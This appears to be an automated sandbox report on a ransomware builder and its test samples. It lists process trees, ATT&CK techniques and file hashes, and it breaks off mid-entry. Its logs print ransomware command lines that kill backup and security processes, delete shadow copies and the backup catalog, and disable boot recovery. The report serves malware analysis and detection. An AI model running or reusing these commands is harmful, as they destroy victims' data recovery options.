  "C:\Windows\System32\cmd.exe" /c netsh advfirewall set allprofiles state on & netsh advfirewall set currentprofile state on & netsh advfirewall set domainprofile state on & netsh advfirewall set privateprofile state on & netsh advfirewall set publicprofile state on & REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /f & REG DELETE HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v DisableTaskMgr /f & REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /f & REG DELETE HKCU\Software\Microsoft\Windows\System\ /v DisableCMD /f & powershell -Command Remove-MpPreference -ExclusionExtension .exe
  2⤵
  PID:2844
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set allprofiles state on
    3⤵
    - Modifies Windows Firewall
    PID:1160
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set currentprofile state on
    3⤵
    - Modifies Windows Firewall
    PID:2788
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set domainprofile state on
    3⤵
    - Modifies Windows Firewall
    PID:2040
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set privateprofile state on
    3⤵
    - Modifies Windows Firewall
    PID:5924
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set publicprofile state on
    3⤵
    - Modifies Windows Firewall
    PID:1752
- - C:\Windows\system32\reg.exe
    REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /f
    3⤵
    PID:1836
- - C:\Windows\system32\reg.exe
    REG DELETE HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v DisableTaskMgr /f
    3⤵
    - Modifies registry key
    PID:1712
- - C:\Windows\system32\reg.exe
    REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /f
    3⤵
    PID:6088
- - C:\Windows\system32\reg.exe
    REG DELETE HKCU\Software\Microsoft\Windows\System\ /v DisableCMD /f
    3⤵
    - Modifies registry key
    PID:644
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Remove-MpPreference -ExclusionExtension .exe
    3⤵
    PID:3532

C:\slam_ransomware_builder\test1.exe
"C:\slam_ransomware_builder\test1.exe"
1⤵
- Executes dropped EXE
- Checks computer location settings
PID:1964
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c netsh advfirewall set allprofiles state on & netsh advfirewall set currentprofile state on & netsh advfirewall set domainprofile state on & netsh advfirewall set privateprofile state on & netsh advfirewall set publicprofile state on & REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /f & REG DELETE HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v DisableTaskMgr /f & REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /f & REG DELETE HKCU\Software\Microsoft\Windows\System\ /v DisableCMD /f & powershell -Command Remove-MpPreference -ExclusionExtension .exe
  2⤵
  PID:3916
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set allprofiles state on
    3⤵
    - Modifies Windows Firewall
    PID:4540
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set currentprofile state on
    3⤵
    - Modifies Windows Firewall
    PID:588
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set domainprofile state on
    3⤵
    - Modifies Windows Firewall
    PID:5724
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set privateprofile state on
    3⤵
    - Modifies Windows Firewall
    PID:4424
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set publicprofile state on
    3⤵
    - Modifies Windows Firewall
    PID:5064
- - C:\Windows\system32\reg.exe
    REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /f
    3⤵
    PID:4044
- - C:\Windows\system32\reg.exe
    REG DELETE HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v DisableTaskMgr /f
    3⤵
    - Modifies registry key
    PID:5664
- - C:\Windows\system32\reg.exe
    REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /f
    3⤵
    PID:3040
- - C:\Windows\system32\reg.exe
    REG DELETE HKCU\Software\Microsoft\Windows\System\ /v DisableCMD /f
    3⤵
    - Modifies registry key
    PID:5772
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Remove-MpPreference -ExclusionExtension .exe
    3⤵
    PID:5760

C:\slam_ransomware_builder\test1.exe
"C:\slam_ransomware_builder\test1.exe"
1⤵
- Executes dropped EXE
- Checks computer location settings
PID:4824
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c netsh advfirewall set allprofiles state on & netsh advfirewall set currentprofile state on & netsh advfirewall set domainprofile state on & netsh advfirewall set privateprofile state on & netsh advfirewall set publicprofile state on & REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /f & REG DELETE HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v DisableTaskMgr /f & REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /f & REG DELETE HKCU\Software\Microsoft\Windows\System\ /v DisableCMD /f & powershell -Command Remove-MpPreference -ExclusionExtension .exe
  2⤵
  PID:1428
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set allprofiles state on
    3⤵
    - Modifies Windows Firewall
    PID:4704
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set currentprofile state on
    3⤵
    - Modifies Windows Firewall
    PID:1884
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set domainprofile state on
    3⤵
    - Modifies Windows Firewall
    PID:3692
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set privateprofile state on
    3⤵
    - Modifies Windows Firewall
    PID:520
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set publicprofile state on
    3⤵
    - Modifies Windows Firewall
    PID:5132
- - C:\Windows\system32\reg.exe
    REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /f
    3⤵
    PID:2104
- - C:\Windows\system32\reg.exe
    REG DELETE HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v DisableTaskMgr /f
    3⤵
    - Modifies registry key
    PID:5716
- - C:\Windows\system32\reg.exe
    REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /f
    3⤵
    PID:2120
- - C:\Windows\system32\reg.exe
    REG DELETE HKCU\Software\Microsoft\Windows\System\ /v DisableCMD /f
    3⤵
    - Modifies registry key
    PID:1212
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Remove-MpPreference -ExclusionExtension .exe
    3⤵
    PID:4992

C:\slam_ransomware_builder\test1.exe
"C:\slam_ransomware_builder\test1.exe"
1⤵
- Executes dropped EXE
- Checks computer location settings
PID:4000
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c netsh advfirewall set allprofiles state on & netsh advfirewall set currentprofile state on & netsh advfirewall set domainprofile state on & netsh advfirewall set privateprofile state on & netsh advfirewall set publicprofile state on & REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /f & REG DELETE HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v DisableTaskMgr /f & REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /f & REG DELETE HKCU\Software\Microsoft\Windows\System\ /v DisableCMD /f & powershell -Command Remove-MpPreference -ExclusionExtension .exe
  2⤵
  PID:3448
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set allprofiles state on
    3⤵
    - Modifies Windows Firewall
    PID:4216
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set currentprofile state on
    3⤵
    - Modifies Windows Firewall
    PID:1756
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set domainprofile state on
    3⤵
    - Modifies Windows Firewall
    PID:5488
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set privateprofile state on
    3⤵
    - Modifies Windows Firewall
    PID:4968
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set publicprofile state on
    3⤵
    - Modifies Windows Firewall
    PID:4872
- - C:\Windows\system32\reg.exe
    REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /f
    3⤵
    PID:3920
- - C:\Windows\system32\reg.exe
    REG DELETE HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v DisableTaskMgr /f
    3⤵
    - Modifies registry key
    PID:4012
- - C:\Windows\system32\reg.exe
    REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /f
    3⤵
    PID:3656
- - C:\Windows\system32\reg.exe
    REG DELETE HKCU\Software\Microsoft\Windows\System\ /v DisableCMD /f
    3⤵
    - Modifies registry key
    PID:840
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Remove-MpPreference -ExclusionExtension .exe
    3⤵
    PID:3984

C:\slam_ransomware_builder\test.exe
"C:\slam_ransomware_builder\test.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Modifies extensions of user files
- Checks computer location settings
- Adds Run key to start application
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5288
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /F /IM BackupExecAgentBrowser* & taskkill /F /IM BackupExecDiveciMediaService* & taskkill /F /IM BackupExecJobEngine* & taskkill /F /IM BackupExecManagementService* & taskkill /F /IM vss* & taskkill /F /IM sql* & taskkill /F /IM svc$* & taskkill /F /IM memtas* & taskkill /F /IM sophos* & taskkill /F /IM veeam* & taskkill /F /IM backup* & taskkill /F /IM GxVss* & taskkill /F /IM GxBlr* & taskkill /F /IM GxFWD* & taskkill /F /IM GxCVD* & taskkill /F /IM GxCIMgr* & taskkill /F /IM DefWatch* & taskkill /F /IM ccEvtMgr* & taskkill /F /IM SavRoam* & taskkill /F /IM RTVscan* & taskkill /F /IM QBFCService* & taskkill /F /IM Intuit.QuickBooks.FCS* & taskkill /F /IM YooBackup* & taskkill /F /IM YooIT* & taskkill /F /IM zhudongfangyu* & taskkill /F /IM sophos* & taskkill /F /IM stc_raw_agent* & taskkill /F /IM VSNAPVSS* & taskkill /F /IM QBCFMonitorService* & taskkill /F /IM VeeamTransportSvc* & taskkill /F /IM VeeamDeploymentService* & taskkill /F /IM VeeamNFSSvc* & taskkill /F /IM veeam* & taskkill /F /IM PDVFSService* & taskkill /F /IM BackupExecVSSProvider* & taskkill /F /IM BackupExecAgentAccelerator* & taskkill /F /IM BackupExecRPCService* & taskkill /F /IM AcrSch2Svc* & taskkill /F /IM AcronisAgent* & taskkill /F /IM CASAD2DWebSvc* & taskkill /F /IM CAARCUpdateSvc* & taskkill /F /IM TeamViewer*
  2⤵
  PID:5636
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecAgentBrowser*
    3⤵
    - Kills process with taskkill
    PID:2948
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecDiveciMediaService*
    3⤵
    - Kills process with taskkill
    PID:5376
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecJobEngine*
    3⤵
    PID:5588
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecManagementService*
    3⤵
    - Kills process with taskkill
    PID:5676
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM vss*
    3⤵
    - Kills process with taskkill
    PID:5884
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM sql*
    3⤵
    - Kills process with taskkill
    PID:6056
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM svc$*
    3⤵
    PID:3340
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM memtas*
    3⤵
    - Kills process with taskkill
    PID:2360
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM sophos*
    3⤵
    - Kills process with taskkill
    PID:1400
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM veeam*
    3⤵
    - Kills process with taskkill
    PID:2592
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM backup*
    3⤵
    - Kills process with taskkill
    PID:2832
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM GxVss*
    3⤵
    PID:1780
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM GxBlr*
    3⤵
    - Kills process with taskkill
    PID:4104
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM GxFWD*
    3⤵
    - Kills process with taskkill
    PID:3864
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM GxCVD*
    3⤵
    - Kills process with taskkill
    PID:4388
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM GxCIMgr*
    3⤵
    - Kills process with taskkill
    PID:4704
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM DefWatch*
    3⤵
    - Kills process with taskkill
    PID:5704
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM ccEvtMgr*
    3⤵
    - Kills process with taskkill
    PID:220
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM SavRoam*
    3⤵
    PID:5472
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM RTVscan*
    3⤵
    PID:5496
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM QBFCService*
    3⤵
    - Kills process with taskkill
    PID:2608
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM Intuit.QuickBooks.FCS*
    3⤵
    - Kills process with taskkill
    PID:4276
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM YooBackup*
    3⤵
    - Kills process with taskkill
    PID:4156
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM YooIT*
    3⤵
    PID:5836
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM zhudongfangyu*
    3⤵
    - Kills process with taskkill
    PID:2184
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM sophos*
    3⤵
    - Kills process with taskkill
    PID:2220
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM stc_raw_agent*
    3⤵
    - Kills process with taskkill
    PID:5844
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM VSNAPVSS*
    3⤵
    - Kills process with taskkill
    PID:5408
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM QBCFMonitorService*
    3⤵
    PID:1756
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM VeeamTransportSvc*
    3⤵
    - Kills process with taskkill
    PID:5344
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM VeeamDeploymentService*
    3⤵
    - Kills process with taskkill
    PID:2104
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM VeeamNFSSvc*
    3⤵
    - Kills process with taskkill
    PID:6128
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM veeam*
    3⤵
    PID:3980
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM PDVFSService*
    3⤵
    PID:1812
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecVSSProvider*
    3⤵
    - Kills process with taskkill
    PID:4516
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecAgentAccelerator*
    3⤵
    - Kills process with taskkill
    PID:1048
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecRPCService*
    3⤵
    - Kills process with taskkill
    PID:4836
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM AcrSch2Svc*
    3⤵
    PID:5888
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM AcronisAgent*
    3⤵
    - Kills process with taskkill
    PID:5856
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM CASAD2DWebSvc*
    3⤵
    - Kills process with taskkill
    PID:1896
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM CAARCUpdateSvc*
    3⤵
    - Kills process with taskkill
    PID:3720
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM TeamViewer*
    3⤵
    - Kills process with taskkill
    PID:4816
- C:\Windows\SysWOW64\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\README.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:4124
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
  2⤵
  PID:3784
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    PID:3496

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:3460

C:\slam_ransomware_builder\test1.exe
"C:\slam_ransomware_builder\test1.exe"
1⤵
- Executes dropped EXE
- Modifies extensions of user files
- Checks computer location settings
- Drops desktop.ini file(s)
PID:3440
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c netsh advfirewall set allprofiles state on & netsh advfirewall set currentprofile state on & netsh advfirewall set domainprofile state on & netsh advfirewall set privateprofile state on & netsh advfirewall set publicprofile state on & REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /f & REG DELETE HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v DisableTaskMgr /f & REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /f & REG DELETE HKCU\Software\Microsoft\Windows\System\ /v DisableCMD /f & powershell -Command Remove-MpPreference -ExclusionExtension .exe
  2⤵
  PID:4944
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set allprofiles state on
    3⤵
    - Modifies Windows Firewall
    PID:3360
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set currentprofile state on
    3⤵
    - Modifies Windows Firewall
    PID:4168
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set domainprofile state on
    3⤵
    - Modifies Windows Firewall
    PID:4036
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set privateprofile state on
    3⤵
    - Modifies Windows Firewall
    PID:4792
- - C:\Windows\system32\netsh.exe
    netsh advfirewall set publicprofile state on
    3⤵
    - Modifies Windows Firewall
    PID:4588
- - C:\Windows\system32\reg.exe
    REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /f
    3⤵
    PID:5140
- - C:\Windows\system32\reg.exe
    REG DELETE HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v DisableTaskMgr /f
    3⤵
    - Modifies registry key
    PID:428
- - C:\Windows\system32\reg.exe
    REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /f
    3⤵
    PID:5672
- - C:\Windows\system32\reg.exe
    REG DELETE HKCU\Software\Microsoft\Windows\System\ /v DisableCMD /f
    3⤵
    - Modifies registry key
    PID:2948
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Remove-MpPreference -ExclusionExtension .exe
    3⤵
    PID:5560

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\CFD3.tmp\start.bat

Filesize
96B

MD5
2615bf9ed6d2e854c0602ef8fdd787df

SHA1
4e0682a961ee43b9ddce5b3c03c83945d7d0cc40

SHA256
a33ee4de5292cb00e1833b85a5dc530240bb5f23ee64a56ae7fa23ae4aabc493

SHA512
24ec09d91c3d8d93c7dd595dad8eefd00de24759e039bc4dfc6967291ee54ef2a65b693b02143352a8a7c0e83b372d77389059811927b18f52472ead1332fb8c

Download Submit
C:\Users\Admin\Downloads\slam ransomware builder installer.exe

Filesize
39.2MB

MD5
f1904cfa100a3bc813a6f8146fe13450

SHA1
833bb8d25e117dec528fe694e70fce625241b653

SHA256
a5e5dd470216db136c61f8e5e85c80dc6cc2dcf76ecc456dd2654b4e12bebf59

SHA512
599181828c24f92e78de85b6a5db3dd15e4a02ed7b8215737b600bb44c416c03ee14d8dce0fc22a3ec7d016fc0c315a2e104f1a73e8ec59adb69e3b568cdc7ca

Download Submit
C:\Users\Admin\Downloads\slam ransomware builder installer.exe

Filesize
39.2MB

MD5
f1904cfa100a3bc813a6f8146fe13450

SHA1
833bb8d25e117dec528fe694e70fce625241b653

SHA256
a5e5dd470216db136c61f8e5e85c80dc6cc2dcf76ecc456dd2654b4e12bebf59

SHA512
599181828c24f92e78de85b6a5db3dd15e4a02ed7b8215737b600bb44c416c03ee14d8dce0fc22a3ec7d016fc0c315a2e104f1a73e8ec59adb69e3b568cdc7ca

Download Submit
C:\slam_ransomware_builder\ConsoleApp2\ConsoleApp2.sln

Filesize
1KB

MD5
d9867f790d17d19dd919ba90ed1576c8

SHA1
483299a1e62f1a6593151cb7891406962f0f6f5f

SHA256
3d22c8efce70229c9fe6b4f6c7db5e6aed86b13bdfa062cb6a7dc4924b6ce2d6

SHA512
01dbe0c98d261962d7ef1bb1365a64fece3f20b1a5cead954ec0a2a79713272c51001ecd11de34fbbc53d783263e3dadb6974f933987b33cb67693df48a15f76

Download Submit
C:\slam_ransomware_builder\ConsoleApp2\ConsoleApp2\1.ico

Filesize
66KB

MD5
889e8ff9455bb4837f91ff644dcf2b82

SHA1
6bc850368a6444885e59d368ab5774cedb6792e2

SHA256
56ee941f7f4fcf1e050be3544ad73cfe7a061f288a3af4960632b0fcced94d51

SHA512
771af6b48883b408d45c952380ede6ab466efb776360af6bda5c0530332876d62b127803e4e4cef7e68dc64f829603cb939dbdc2d8cafe3d08dc954b796f2fa4

Download Submit
C:\slam_ransomware_builder\ConsoleApp2\ConsoleApp2\App.config

Filesize
189B

MD5
9dbad5517b46f41dbb0d8780b20ab87e

SHA1
ef6aef0b1ea5d01b6e088a8bf2f429773c04ba5e

SHA256
47e5a0f101af4151d7f13d2d6bfa9b847d5b5e4a98d1f4674b7c015772746cdf

SHA512
43825f5c26c54e1fc5bffcce30caad1449a28c0c9a9432e9ce17d255f8bf6057c1a1002d9471e5b654ab1de08fb6eabf96302cdb3e0fb4b63ba0ff186e903be8

Download Submit
C:\slam_ransomware_builder\ConsoleApp2\ConsoleApp2\ConsoleApp2.csproj

Filesize
3KB

MD5
10fde86ad04c13c1504c2b35b1e13d3b

SHA1
a13001bdaca14977bbb7522544f3d5f6f38ba759

SHA256
c5cd177d7580c2d3cd6445d719269478dc1f575911ac1dedfdb2dab57c1f1dcb

SHA512
81ad4bb9564bd775f8d35e2554b32e8a15894d446d885a67608fd5aaf36c1a2191f2b47623776b5941fc9de1cff5c8079433bd42814b5446393f9d6c4b138239

Download Submit
C:\slam_ransomware_builder\ConsoleApp2\ConsoleApp2\Properties\AssemblyInfo.cs

Filesize
569B

MD5
6ae5c2395170e2d6d29d4f1e95e676e6

SHA1
533905ab44c6c68b58212f62202549646e23f2f6

SHA256
c12e04bcf0c4bd14dcbb50cc96416c77080ffc4bac7fb784d462ee6d6d163d6f

SHA512
492b0f4e8d4783194438f6be9d432bc008b7d72a31dbaf9aca5714e276ee13f8310408f379f165ec4ac63eb59404899c772f471a48a785ad8fd79c1cd9bfc80e

Download Submit
C:\slam_ransomware_builder\ConsoleApp2\ConsoleApp2\Properties\Resources.resx

Filesize
6KB

MD5
a73549f32d077a8c19bcaafe5dc34c13

SHA1
e148e987ee299d88bdddd83107661584366536b5

SHA256
8aa81e098cfe66b5b30ebaef4aea19d22d229138ab19059f7cbd7feff04fec56

SHA512
4b009bdcba0d07965a8d0658da9cd28b5730b89731b3030cd81f74dc989fc0bf6df7141ec4935166b0516f0f1f3ec85becdc98cdeb7b6fc1d5088f8368692f56

Download Submit
C:\slam_ransomware_builder\ConsoleApp2\ConsoleApp2\Resources\Newtonsoft.Json.dl

Filesize
685KB

MD5
081d9558bbb7adce142da153b2d5577a

SHA1
7d0ad03fbda1c24f883116b940717e596073ae96

SHA256
b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

SHA512
2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

Download Submit
C:\slam_ransomware_builder\ConsoleApp2\ConsoleApp2\Resources\wallpaper.jpg.SLAM

Filesize
122KB

MD5
f83cd0592ef46ff26c4b81f3ebbeec1c

SHA1
9a99d054675e7fa659188e1057a271b4b59c6e78

SHA256
2c070169ac950517fd5e828e309fb0e27ad24cfc94dfbc2c3de5f6a9adbc8d7b

SHA512
6c3576a275fb7da04c982682999ebaed346af757e88f2b5d12cc1ecaf3bb9639a458a2e207f69d5fa04dd03272e831d1c07e0a7c46beb28c2a51ef93425b2df9

Download Submit
C:\slam_ransomware_builder\ConsoleApp2\ConsoleApp2\Resources\wallpaper.jpg.SLAM

Filesize
122KB

MD5
f83cd0592ef46ff26c4b81f3ebbeec1c

SHA1
9a99d054675e7fa659188e1057a271b4b59c6e78

SHA256
2c070169ac950517fd5e828e309fb0e27ad24cfc94dfbc2c3de5f6a9adbc8d7b

SHA512
6c3576a275fb7da04c982682999ebaed346af757e88f2b5d12cc1ecaf3bb9639a458a2e207f69d5fa04dd03272e831d1c07e0a7c46beb28c2a51ef93425b2df9

Download Submit
C:\slam_ransomware_builder\ConsoleApp2\ConsoleApp2\obj\Debug\.NETFramework,Version=v4.7.2.AssemblyAttributes.cs

Filesize
214B

MD5
896ab120ac6b6af2895fdb71c452b9d3

SHA1
eb545ccd7a1bafcdf31ad0f32c09ac505744aa39

SHA256
621199557e90fb1661e401cc9a973163c850b4b7e65bbc8d100f67f6699eef70

SHA512
834f53444444cee5c348da44674a2b8e6ce51f21a7565a23629001a5c535533c78a4dff8663176d982bab24f0dd272868cfc5c2fadeccc9b97a14f6946766dee

Download Submit
C:\slam_ransomware_builder\ConsoleApp2\ConsoleApp2\obj\Debug\ConsoleApp2.csproj.AssemblyReference.cache

Filesize
9KB

MD5
f95571aba36661a497553a04bd470ce0

SHA1
10a7917eb303c620b9bbfd549eb20dfc1516932c

SHA256
202f72d03579fbf9f65535a0299078f1e56355ac1bd82f7a49eb83429599c0ba

SHA512
758e3eddbacec89f4c6bebdeb0754cc18f414885740992187d49d47ca07f30318eaccc0a6e3d4625afe580b2877d37c9e2768af92065bcc288c0d72cc46f37b4

Download Submit
C:\slam_ransomware_builder\ConsoleApp2\ConsoleApp2\obj\Debug\DesignTimeResolveAssemblyReferencesInput.cache

Filesize
8KB

MD5
73b6fc93329bc76c8769664f37a38713

SHA1
826735c744989d0f03d733ccbb6f1c0944be1eea

SHA256
7da3e39b3f6a792f6dc37dfb2f678b7c603ba0ba520bee73e7011b14117c1806

SHA512
a2e3884c992acace66264958e8aefc55b1d1f504fe30627881db6573a9254bce971164b83144c0ff92e11bfe1ff41ce62ad0a695f9ccaa9eb6952f27b96a2644

Download Submit
C:\slam_ransomware_builder\ConsoleApp2\Newtonsoft.Json.dll

Filesize
685KB

MD5
081d9558bbb7adce142da153b2d5577a

SHA1
7d0ad03fbda1c24f883116b940717e596073ae96

SHA256
b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

SHA512
2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

Download Submit
C:\slam_ransomware_builder\ConsoleApp2\Newtonsoft.Json.dll

Filesize
685KB

MD5
081d9558bbb7adce142da153b2d5577a

SHA1
7d0ad03fbda1c24f883116b940717e596073ae96

SHA256
b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

SHA512
2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

Download Submit
C:\slam_ransomware_builder\ConsoleApp2\Newtonsoft.Json.dll

Filesize
685KB

MD5
081d9558bbb7adce142da153b2d5577a

SHA1
7d0ad03fbda1c24f883116b940717e596073ae96

SHA256
b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

SHA512
2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

Download Submit
C:\slam_ransomware_builder\FastColoredTextBox.dll

Filesize
325KB

MD5
adac0cee5cc4de7d4046ae1243e41bf0

SHA1
c8d6d92f0dbee64d0f4c0930f0d2699a8253e891

SHA256
